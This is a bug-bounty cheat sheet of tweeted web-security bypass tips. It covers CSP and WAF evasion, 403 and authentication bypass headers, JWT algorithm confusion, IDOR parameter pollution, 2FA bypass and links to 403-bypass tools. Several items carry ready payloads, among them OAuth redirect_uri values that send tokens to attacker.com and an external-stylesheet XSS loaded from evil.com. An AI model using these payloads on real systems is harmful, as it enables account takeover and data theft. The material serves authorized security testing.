# Bypasses

* [It's possible to bypass #CSP with the following : #JSONP: \<script src="https://trustedsite/jsonp?callback=payload"> #AngularJS \<script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> \<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>](https://twitter.com/fasthm00/status/1083371791760818176)
* [Encountered with AWS WAF? Just add "\<!" (without quotes) before your payload and bypass that WAF. :) eg: \<!alert(1) #BugBounty #bugbountytip #bugbountytips](https://twitter.com/neeraj_sonaniya/status/1089235277250387969)
* [If the target is using @Cloudflare, dig in their DNS records and search for the origin IP address. If you attack the application directly by its IP, Cloudflare's WAF will not be there.](https://twitter.com/rvismit/status/1090495957802860544)
* [Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc.  iFrame with javascript URI payload. Line feeds \[CRLF\] obfuscate it.](https://twitter.com/LooseSecurity/status/1094615936223625216)
* [Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://\*.foo.foo:\* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip](https://twitter.com/ibrahimdraidia/status/1087031047571849217)
* [Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty](https://twitter.com/ameenmaali/status/1159558019551657984)
* [When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.](https://twitter.com/hakluke/status/1183314554874318849)
* CSP Bypass, script-src 'self' data: - <https://twitter.com/404death/status/1191222237782659072>
* [Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter](https://twitter.com/Hxzeroone/status/1250342399068352512).

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-M55TlR4-Ifp2VD8r0Q2%2F-M55hqUluNmEHEAZX7-U%2Fimage.png?alt=media\&token=33557684-fd39-43de-b8bb-d984c143a886)

* [I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.](https://twitter.com/imhaxormad/status/1252495614161506309)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-M5G3kdjqWpnM7DVdiVu%2F-M5RCttFKFy7E15vZIX_%2Fimage.png?alt=media\&token=35c039f3-eeb5-4d81-99c2-17e8bc0fa79e)

* OTP bypass - <https://twitter.com/HackerHumble>
* [Sometimes you find those PATHs that forward to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)](https://twitter.com/_ayoubfathi_/status/1041319555308707841)
{% embed url="<https://twitter.com/HackerHumble/status/1274259490322313219>" %}

Cloudfront Bypass -

{% embed url="<https://twitter.com/jzks3c/status/1263041062450475008>" %}

403 Bypass:

![https://twitter.com/RathiArpeet/status/1315593774773334016](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MKB2ayVeTORCPblf1iD%2F-MKB2mTKXUzWIf2bwQKw%2Fimage.png?alt=media\&token=abd56617-f8d3-4cf7-b343-574662069b3d)

{% embed url="<https://twitter.com/M404ntf/status/1318387981015724034>" %}

{% embed url="<https://twitter.com/remonsec/status/1315301941170249733>" %}

{% embed url="<https://twitter.com/remonsec/status/1316364534156677121>" %}

![https://twitter.com/hackerscrolls/status/1254701239360720900](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MN6ccuUv76YD_-SLXTX%2F-MN7SrOGHSCaJbHz4kwY%2Fimage.png?alt=media\&token=cc5cc231-579a-45cc-b4d9-719015cd18ef)

**Tool -**

* <https://github.com/lobuhi/byp4xx>

* <https://github.com/Raywando/4xxbypass>

* <https://github.com/sting8k/BurpSuite_403Bypasser>

* [If the “origin” header doesn't work, try with “x-\[org name\]-origin”, same thing for all headers!! e.g. x-uber-origin, x-uber-host, ..etc](https://twitter.com/m4ll0k/status/1280803080624377857?s=20)

* [#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect\_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...](https://twitter.com/ElMrhassel/status/1282661956676182017?s=20)

* [Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [What worked was... \udfff -> � -> ?](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Therefore... {"redirectUri":"https://attacker\udfff@\[victim\]/"}](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Equals... Location: https://attacker?@\[victim\]/](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

* [JWT Token Bypasses #2:](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)

  1. [Capture the JWT token.](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)
  2. [If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)

* [Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bugbountytip](https://twitter.com/jae_hak99/status/1285513974931288064?s=20)

* Price Manipulation -

![https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MT9uGioqlkbNTbw74-7%2F-MT9uPDqxkgsk4a7tGKT%2Fimage.png?alt=media\&token=3b5299e4-7b83-4d90-a52d-62db81f27732)

* [{“id”:111} --> 401 Unauthorized {“id”:{“id”:111}} --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

  [POST /api/get\_profile Content-Type: application/json {“user\_id”:,”user\_id”:}](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

  [GET /api\_v1/messages?user\_id=VICTIM\_ID --> 401](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

  [GET /api\_v1/messages?user\_id=attack\&user\_id=VICTIM --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

* [How to find authentication bypass vulnerabilities. Focus. I Added headers.](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Request GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)
* CSP - [So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' and call it from external "\<svg>\<link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec](https://twitter.com/akita_zen/status/1263963555805696004?s=20)
* ![https://twitter.com/iam\_j0ker/status/1303658167205728256?s=20](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MTeayegO_ZC4SOKjW3o%2F-MTebHg8OI8BG8zWV1nx%2Fimage.png?alt=media\&token=067802f2-4174-4b12-8460-441d9a1c540a)

* [CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [But I can raise it again to P3 (Iframe Injection) and Triaged.](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe src= blocked by CSP](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [Solution:](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe srcdoc=](https://twitter.com/xchopath/status/1164775304700628992?s=20)

{% embed url="<https://twitter.com/d4rkhunt3r_/status/1314249917163077634?s=20>" %}

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MWEPZxcDTld5U7Emc0F%2F-MWEQ0G-MJy1Fs58xRMf%2Fimage.png?alt=media\&token=b5199529-a281-4a32-9930-f74a1fed2c44)

* [Auth bypass tip:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [Found:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:\[ + \] PII Info disclosure \[ + \] Sensitive info leak \[ + \] Access admin endpoint #bugbantytips #bugbountytips](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)
* [1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips](https://twitter.com/Sm4rty_/status/1368250042436308992?s=20)
